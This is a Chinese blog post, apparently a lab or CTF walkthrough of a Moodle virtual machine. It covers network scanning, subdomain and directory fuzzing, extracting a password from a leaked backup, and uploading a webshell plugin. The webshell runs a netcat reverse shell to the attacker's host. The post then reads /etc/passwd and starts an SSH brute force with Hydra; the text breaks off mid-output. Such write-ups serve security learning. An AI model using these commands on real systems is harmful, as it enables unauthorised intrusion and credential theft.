<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="1.搜寻12345678┌──(root㉿kali)-[~]└─# arp-scan -l             Interface: eth0, type: EN10MB, MAC: 00:0c:29:dc:17:7e, IPv4: 192.168.3.43Starting arp-scan 1.10.0 with 256 hosts (https:&#x2F;&#x2F;github.com&#x2F;royhills&#x2F;">
<meta property="og:type" content="article">
<meta property="og:title" content="zhaochoudecat">
<meta property="og:url" content="https://zhaochoudecat.github.io/2026/01/10/QQGroup/Moddle/Moddle/index.html">
<meta property="og:site_name" content="zhaochoudecat">
<meta property="og:description" content="1.搜寻12345678┌──(root㉿kali)-[~]└─# arp-scan -l             Interface: eth0, type: EN10MB, MAC: 00:0c:29:dc:17:7e, IPv4: 192.168.3.43Starting arp-scan 1.10.0 with 256 hosts (https:&#x2F;&#x2F;github.com&#x2F;royhills&#x2F;">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2026-01-10T03:42:42.053Z">
<meta property="article:modified_time" content="2026-01-14T06:30:36.405Z">
<meta property="article:author" content="zhaochoudecat">
<meta name="twitter:card" content="summary">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>zhaochoudecat</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- rss -->
    
    
<meta name="generator" content="Hexo 8.1.1"></head>

<body>
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fa fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fa fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/zhaochoudecat">Projects</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2026/01/11/QQGroup/market_vs_bank/market_vs_bank/"><i class="fa fa-chevron-left" aria-hidden="true" onmouseover='$("#i-prev").toggle();' onmouseout='$("#i-prev").toggle();'></i></a></li>
        
        
        <li><a class="icon" href="/2026/01/08/QQGroup/111/111/"><i class="fa fa-chevron-right" aria-hidden="true" onmouseover='$("#i-next").toggle();' onmouseout='$("#i-next").toggle();'></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa fa-chevron-up" aria-hidden="true" onmouseover='$("#i-top").toggle();' onmouseout='$("#i-top").toggle();'></i></a></li>
        <li><a class="icon" href="#"><i class="fa fa-share-alt" aria-hidden="true" onmouseover='$("#i-share").toggle();' onmouseout='$("#i-share").toggle();' onclick='$("#share").toggle();return false;'></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://zhaochoudecat.github.io/2026/01/10/QQGroup/Moddle/Moddle/"><i class="fa fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://zhaochoudecat.github.io/2026/01/10/QQGroup/Moddle/Moddle/&text="><i class="fa fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://zhaochoudecat.github.io/2026/01/10/QQGroup/Moddle/Moddle/&title="><i class="fa fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://zhaochoudecat.github.io/2026/01/10/QQGroup/Moddle/Moddle/&is_video=false&description="><i class="fa fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=&body=Check out this article: https://zhaochoudecat.github.io/2026/01/10/QQGroup/Moddle/Moddle/"><i class="fa fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://zhaochoudecat.github.io/2026/01/10/QQGroup/Moddle/Moddle/&title="><i class="fa fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://zhaochoudecat.github.io/2026/01/10/QQGroup/Moddle/Moddle/&title="><i class="fa fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://zhaochoudecat.github.io/2026/01/10/QQGroup/Moddle/Moddle/&title="><i class="fa fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://zhaochoudecat.github.io/2026/01/10/QQGroup/Moddle/Moddle/&title="><i class="fa fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://zhaochoudecat.github.io/2026/01/10/QQGroup/Moddle/Moddle/&name=&description="><i class="fa fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E6%90%9C%E5%AF%BB"><span class="toc-number">1.</span> <span class="toc-text">1.搜寻</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#nmap"><span class="toc-number">1.1.</span> <span class="toc-text">nmap</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#wfuzz-%E5%AD%90%E5%9F%9F%E5%90%8D"><span class="toc-number">1.2.</span> <span class="toc-text">wfuzz 子域名</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#dirsearch"><span class="toc-number">1.3.</span> <span class="toc-text">dirsearch</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">2.分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#curl"><span class="toc-number">2.1.</span> <span class="toc-text">curl</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#login"><span class="toc-number">2.2.</span> <span class="toc-text">login</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#hackbar"><span class="toc-number">2.3.</span> <span class="toc-text">hackbar</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E8%BF%9B%E5%85%A5%E7%B3%BB%E7%BB%9F"><span class="toc-number">3.</span> <span class="toc-text">3.进入系统</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%A1%88%E4%B8%80"><span class="toc-number">3.1.</span> <span class="toc-text">方案一</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%A1%88%E4%BA%8C"><span class="toc-number">3.2.</span> <span class="toc-text">方案二</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index width mx-auto px2 my4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">zhaochoudecat</span>
      </span>
      
    <div class="postdate">
        <time datetime="2026-01-10T03:42:42.053Z" itemprop="datePublished">2026-01-10</time>
    </div>


      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="1-搜寻"><a href="#1-搜寻" class="headerlink" title="1.搜寻"></a>1.搜寻</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~]</span><br><span class="line">└─# arp-scan -l             </span><br><span class="line">Interface: eth0, <span class="built_in">type</span>: EN10MB, MAC: 00:0c:29:dc:17:7e, IPv4: 192.168.3.43</span><br><span class="line">Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)</span><br><span class="line">192.168.3.1     18:d9:8f:c8:68:38       Huawei Device Co., Ltd.</span><br><span class="line">192.168.3.4     00:e0:4c:4d:2a:68       REALTEK SEMICONDUCTOR CORP.</span><br><span class="line">192.168.3.5     b4:2e:99:cc:28:45       GIGA-BYTE TECHNOLOGY CO.,LTD.</span><br><span class="line">192.168.3.192   08:00:27:99:e3:83       PCS Systemtechnik GmbH</span><br></pre></td></tr></table></figure>

<p>IP : <code>192.168.3.192 </code></p>
<h3 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~]</span><br><span class="line">└─# nmap -p- -A -sVC 192.168.3.192     </span><br><span class="line">Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-10 11:44 CST</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 192.168.3.192</span><br><span class="line">Host is up (0.00049s latency).</span><br><span class="line">Not shown: 65533 closed tcp ports (reset)</span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)</span><br><span class="line">| ssh-hostkey: </span><br><span class="line">|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)</span><br><span class="line">|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)</span><br><span class="line">|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)</span><br><span class="line">80/tcp open  http    Apache httpd 2.4.62 ((Debian))</span><br><span class="line">|_http-server-header: Apache/2.4.62 (Debian)</span><br><span class="line">|_http-title: Site doesn<span class="string">&#x27;t have a title (text/html).</span></span><br><span class="line"><span class="string">MAC Address: 08:00:27:99:E3:83 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)</span></span><br><span class="line"><span class="string">Device type: general purpose|router</span></span><br><span class="line"><span class="string">Running: Linux 4.X|5.X, MikroTik RouterOS 7.X</span></span><br><span class="line"><span class="string">OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3</span></span><br><span class="line"><span class="string">OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)</span></span><br><span class="line"><span class="string">Network Distance: 1 hop</span></span><br><span class="line"><span class="string">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">TRACEROUTE</span></span><br><span class="line"><span class="string">HOP RTT     ADDRESS</span></span><br><span class="line"><span class="string">1   0.50 ms 192.168.3.192</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span></span><br><span class="line"><span class="string">Nmap done: 1 IP address (1 host up) scanned in 16.41 seconds</span></span><br></pre></td></tr></table></figure>


<h3 id="wfuzz-子域名"><a href="#wfuzz-子域名" class="headerlink" title="wfuzz 子域名"></a>wfuzz 子域名</h3><p>&#x3D;&#x3D;需要注意子域名&#x3D;&#x3D;</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~]</span><br><span class="line">└─# wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u moodle.dsz -H &#x27;Host: FUZZ.moodle.dsz&#x27; --hh 20</span><br><span class="line"> /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz&#x27;s documentation for more information.</span><br><span class="line">********************************************************</span><br><span class="line">* Wfuzz 3.1.0 - The Web Fuzzer                         *</span><br><span class="line">********************************************************</span><br><span class="line"></span><br><span class="line">Target: http://moodle.dsz/</span><br><span class="line">Total requests: 4989</span><br><span class="line"></span><br><span class="line">=====================================================================</span><br><span class="line">ID           Response   Lines    Word       Chars       Payload                                                             </span><br><span class="line">=====================================================================</span><br><span class="line"></span><br><span class="line">000000001:   303        52 L     132 W      1482 Ch     &quot;www&quot;                                                               </span><br><span class="line">000000019:   200        95 L     174 W      2512 Ch     &quot;dev&quot;                                                               </span><br><span class="line"></span><br><span class="line">Total time: 0</span><br><span class="line">Processed Requests: 4989</span><br><span class="line">Filtered Requests: 4987</span><br><span class="line">Requests/sec.: 0</span><br></pre></td></tr></table></figure>
<p>或者执行<code>wfuzz -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u moodle.dsz -H &#39;Host: FUZZ.moodle.dsz&#39; --hh 20</code></p>
<p><strong>–hh 20</strong></p>
<ul>
<li><code>--hh</code>：全称 <code>Hide Response with specified Hash</code>，即<strong>隐藏响应体哈希值等于指定数值（此处为 20）的请求结果</strong>，本质是<strong>过滤无效响应、只保留有效结果</strong>的核心参数。</li>
<li>背后逻辑：<ol>
<li>当测试一个<strong>不存在的子域名</strong>时，目标服务器通常会返回统一的错误响应（如 404 页面、默认空白页面、统一跳转页面等），这类无效响应的内容是一致的，因此它们的响应体哈希值也相同（此处这个统一哈希值就是 20）。</li>
<li>若不添加该过滤参数，wfuzz 会输出 10 万条结果（对应字典的 10 万个条目），其中绝大多数是无效的不存在子域名，难以快速筛选有效结果。</li>
<li><code>--hh 20</code> 会屏蔽所有响应体哈希值为 20 的无效结果，只保留哈希值<strong>不等于 20</strong> 的响应（即大概率是<strong>存在的有效子域名</strong>，对应服务器返回的正常响应或不同的错误响应），极大提升枚举效率。</li>
</ol>
</li>
</ul>
<h3 id="dirsearch"><a href="#dirsearch" class="headerlink" title="dirsearch"></a>dirsearch</h3><p>&#x3D;&#x3D;改下host&#x3D;&#x3D;  </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">╭─root@kali ~ </span><br><span class="line">╰─# cat /etc/hosts           </span><br><span class="line">127.0.0.1       localhost</span><br><span class="line">127.0.1.1       kali</span><br><span class="line"></span><br><span class="line"># The following lines are desirable for IPv6 capable hosts</span><br><span class="line">::1     localhost ip6-localhost ip6-loopback</span><br><span class="line">ff02::1 ip6-allnodes</span><br><span class="line">ff02::2 ip6-allrouters</span><br><span class="line"></span><br><span class="line">#test</span><br><span class="line">192.168.3.192  dev.moodle.dsz</span><br></pre></td></tr></table></figure>

<p>指定状态码返回200的</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~                                                                                                      ▶ dirsearch -u http://dev.moodle.dsz -i 200                                                                      </span><br><span class="line">/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html</span><br><span class="line">  from pkg_resources import DistributionNotFound, VersionConflict</span><br><span class="line"></span><br><span class="line">  _|. _ _  _  _  _ _|_    v0.4.3</span><br><span class="line"> (_||| _) (/_(_|| (_| )</span><br><span class="line"></span><br><span class="line">Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460</span><br><span class="line"></span><br><span class="line">Output File: /root/reports/http_dev.moodle.dsz/_26-01-13_22-01-23.txt</span><br><span class="line"></span><br><span class="line">Target: http://dev.moodle.dsz/</span><br><span class="line"></span><br><span class="line">[22:01:23] Starting: </span><br><span class="line">[22:01:48] 200 -   74MB - /backup.tar.gz</span><br><span class="line"></span><br><span class="line">Task Completed</span><br></pre></td></tr></table></figure>

<h2 id="2-分析"><a href="#2-分析" class="headerlink" title="2.分析"></a>2.分析</h2><h3 id="curl"><a href="#curl" class="headerlink" title="curl"></a>curl</h3><p>下载到本地</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -O http://dev.moodle.dsz/backup.tar.gz</span><br></pre></td></tr></table></figure>
<p>解压后打开下载的文件，<code>config.php</code>中找到一个密码 <code>pzp5V2Of3akjaJrhRauR</code><br>![[Pasted image 20260113221419.png]]<br>发现密码 <code>pzp5V2Of3akjaJrhRauR.</code></p>
<h3 id="login"><a href="#login" class="headerlink" title="login"></a>login</h3><p>测试过程中发现还是要改一次<code>hosts</code>文件  <code>192.168.3.192 moodle.dsz</code><br>![[Pasted image 20260110120429.png]]<br><a target="_blank" rel="noopener" href="https://github.com/p0dalirius/Moodle-webshell-plugin/tree/master?tab=readme-ov-file">https://github.com/p0dalirius/Moodle-webshell-plugin/tree/master?tab=readme-ov-file</a> 上传插件，可以参考<code>github</code>上的视频</p>
<p>![[shell操作.mp4]]</p>
<p>下载对应的插件后，点击上传，<code>Upload a file</code><br>![[Pasted image 20260113222604.png]]</p>
<h3 id="hackbar"><a href="#hackbar" class="headerlink" title="hackbar"></a>hackbar</h3><p>执行下 <code>http://moodle.dsz/local/moodle_webshell/webshell.php?action=exec&amp;cmd=id</code> 查看是否成功</p>
<p>![[Pasted image 20260113223247.png]]<br> <strong>nc反弹</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://moodle.dsz/local/moodle_webshell/webshell.php?action=exec&amp;cmd=busybox nc 192.168.3.48 1111 -e /bin/bash </span><br></pre></td></tr></table></figure>
<p>![[Pasted image 20260113223744.png]]</p>
<h2 id="3-进入系统"><a href="#3-进入系统" class="headerlink" title="3.进入系统"></a>3.进入系统</h2><p><strong>搜寻有用的信息</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">www-data@Moodle:/opt$ <span class="built_in">cat</span> hint.txt</span><br><span class="line"><span class="built_in">cat</span> hint.txt</span><br><span class="line">root 的凭证隐藏在众目睽睽之下</span><br><span class="line">// ^[a-zA-Z0-9]&#123;20&#125;$</span><br><span class="line"></span><br><span class="line">www-data@Moodle:/tmp$ <span class="built_in">cat</span> /etc/passwd</span><br><span class="line"><span class="built_in">cat</span> /etc/passwd</span><br><span class="line">root:x:0:0:root:/root:/bin/bash</span><br><span class="line">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span><br><span class="line">bin:x:2:2:bin:/bin:/usr/sbin/nologin</span><br><span class="line">sys:x:3:3:sys:/dev:/usr/sbin/nologin</span><br><span class="line"><span class="built_in">sync</span>:x:4:65534:<span class="built_in">sync</span>:/bin:/bin/sync</span><br><span class="line">games:x:5:60:games:/usr/games:/usr/sbin/nologin</span><br><span class="line">man:x:6:12:man:/var/cache/man:/usr/sbin/nologin</span><br><span class="line">lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</span><br><span class="line">mail:x:8:8:mail:/var/mail:/usr/sbin/nologin</span><br><span class="line">news:x:9:9:news:/var/spool/news:/usr/sbin/nologin</span><br><span class="line">uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin</span><br><span class="line">proxy:x:13:13:proxy:/bin:/usr/sbin/nologin</span><br><span class="line">www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</span><br><span class="line">backup:x:34:34:backup:/var/backups:/usr/sbin/nologin</span><br><span class="line">list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin</span><br><span class="line">irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin</span><br><span class="line">gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin</span><br><span class="line">nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin</span><br><span class="line">_apt:x:100:65534::/nonexistent:/usr/sbin/nologin</span><br><span class="line">systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin</span><br><span class="line">systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin</span><br><span class="line">systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin</span><br><span class="line">systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin</span><br><span class="line">messagebus:x:104:110::/nonexistent:/usr/sbin/nologin</span><br><span class="line">sshd:x:105:65534::/run/sshd:/usr/sbin/nologin</span><br><span class="line">mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false</span><br><span class="line">kotori:x:1000:1000:,,,:/home/kotori:/bin/bash</span><br><span class="line">www-data@Moodle:/tmp$ </span><br></pre></td></tr></table></figure>

<p>用户<code>kotori</code>的密码就是 <code>pzp5V2Of3akjaJrhRauR.</code> </p>
<h3 id="方案一"><a href="#方案一" class="headerlink" title="方案一"></a>方案一</h3><p>根据<code>hint</code>进行查询</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">kotori@Moodle:~$ grep -raohE <span class="string">&#x27;\b[a-zA-Z0-9]&#123;20&#125;\b&#x27;</span> /etc /var/www /opt /home 2&gt;/dev/null &gt;&gt; a.txt</span><br><span class="line">kotori@Moodle:~$ <span class="built_in">ls</span> -l</span><br><span class="line">total 1444</span><br><span class="line">-rw-r--r-- 1 kotori kotori 1135334 Jan 13 09:46 a.txt</span><br><span class="line">-rw-r--r-- 1 kotori kotori  332111 Apr 17  2023 linpeas.sh</span><br><span class="line">-rw-r--r-- 1 root   root        44 Dec 26 22:22 user.txt</span><br></pre></td></tr></table></figure>


<blockquote>
<p>[!Info] 搜索代码解释<br><code>-r</code> <code>--recursive</code><br>递归扫描模式：遍历指定目录下的所有文件，包括子目录中的文件，不会跳过子目录</p>
<p><code>-a</code> <code>--text</code> &#x2F; <code>--binary-files=text</code><br>二进制文件文本化处理：将所有被扫描的文件（包括二进制文件，如可执行程序、图片等）都当作 ASCII 文本文件处理，避免<code>grep</code>识别为二进制文件而直接跳过，确保能提取其中的可读字母数字字符串</p>
<p><code>-o</code> <code>--only-matching</code><br>仅输出匹配内容：不输出包含匹配结果的整行内容，只提取并输出恰好匹配正则表达式的部分（这是提取 20 位字符串的关键，避免冗余内容）<br><code>-h</code> <code>--no-filename</code>屏蔽文件名输出：匹配结果中不显示该字符串来自哪个文件，仅输出匹配的字符串本身（若需要保留文件名，可去掉该参数）</p>
<p><code>-E</code> <code>--extended-regexp</code>启用扩展正则表达式：支持更简洁的正则语法（如<code>{20}</code>无需转义为<code>\{20\}</code>），简化正则编写，提升可读性</p>
</blockquote>
<blockquote>
<p>[!NOTE] ##### 正则表达式深度解析</p>
<p><code>\b[a-zA-Z0--9]{20}\b</code>是这个命令的灵魂：</p>
<ul>
<li><code>\b</code>：<strong>单词边界</strong>。确保匹配的是一个完整的“单词”，而不是更长字符串的一部分。例如，它能匹配 <code>ABC123def456ghi789XYZ</code>，但不会匹配 <code>prefix_ABC123def456ghi789XYZ_suffix</code>这样的字符串。 </li>
<li><code>[a-zA-Z0-9]</code>：一个<strong>字符组</strong>，匹配任意一个大小写英文字母或数字。</li>
<li><code>{20}</code>：一个<strong>量词</strong>，表示前面的字符组（<code>[a-zA-Z0-9]</code>）必须<strong>连续出现恰好20次</strong>。</li>
</ul>
</blockquote>
<p>将下载的<code>a.txt</code>复制到本地 用<code>hrdra</code>破解（本地机器执行）<br><code>scp kotori@192.168.3.192:~/a.txt ./</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">hydra -t 4 -l root -P a.txt -I -f -vV 192.168.3.192 ssh</span><br><span class="line">Hydra v9.6 (c) 2023 by van Hauser/THC &amp; David Maciejak - Please <span class="keyword">do</span> not use <span class="keyword">in</span> military or secret service organizations, or <span class="keyword">for</span> illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).</span><br><span class="line"></span><br><span class="line">Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-13 22:52:46</span><br><span class="line">[DATA] max 4 tasks per 1 server, overall 4 tasks, 54060 login tries (l:1/p:54060), ~13515 tries per task</span><br><span class="line">[DATA] attacking ssh://192.168.3.192:22/</span><br><span class="line">[VERBOSE] Resolving addresses ... [VERBOSE] resolving <span class="keyword">done</span></span><br><span class="line">[INFO] Testing <span class="keyword">if</span> password authentication is supported by ssh://root@192.168.3.192:22</span><br><span class="line">[INFO] Successful, password authentication is supported by ssh://192.168.3.192:22</span><br><span class="line">[ATTEMPT] target 192.168.3.192 - login <span class="string">&quot;root&quot;</span> - pass <span class="string">&quot;klanguageoverridesrc&quot;</span> - 1 of 54060 [child 0] (0/0)</span><br><span class="line">[ATTEMPT] target 192.168.3.192 - login <span class="string">&quot;root&quot;</span> - pass <span class="string">&quot;GetServerInformation&quot;</span> - 2 of 54060 [child 1] (0/0)</span><br><span class="line">[ATTEMPT] target 192.168.3.192 - login <span class="string">&quot;root&quot;</span> - pass <span class="string">&quot;klanguageoverridesrc&quot;</span> - 3 of 54060 [child 2] (0/0)</span><br><span class="line">[ATTEMPT] target 192.168.3.192 - login <span class="string">&quot;root&quot;</span> - pass <span class="string">&quot;klanguageoverridesrc&quot;</span> - 4 of 54060 [child 3] (0/0)</span><br><span class="line">[ATTEMPT] target 192.168.3.192 - login <span class="string">&quot;root&quot;</span> - pass <span class="string">&quot;klanguageoverridesrc&quot;</span> - 5 of 54060 [child 0] (0/0)</span><br><span class="line">[ATTEMPT] target 192.168.3.192 - login <span class="string">&quot;root&quot;</span> - pass <span class="string">&quot;drmGetMinorNameForFD&quot;</span> - 6 of 54060 [child 1] (0/0)</span><br><span class="line">[ATTEMPT] target 192.168.3.192 - login <span class="string">&quot;root&quot;</span> - pass <span class="string">&quot;sF6Kfzr69w7dyZALAhl6&quot;</span> - 7 of 54060 [child 3] (0/0)</span><br><span 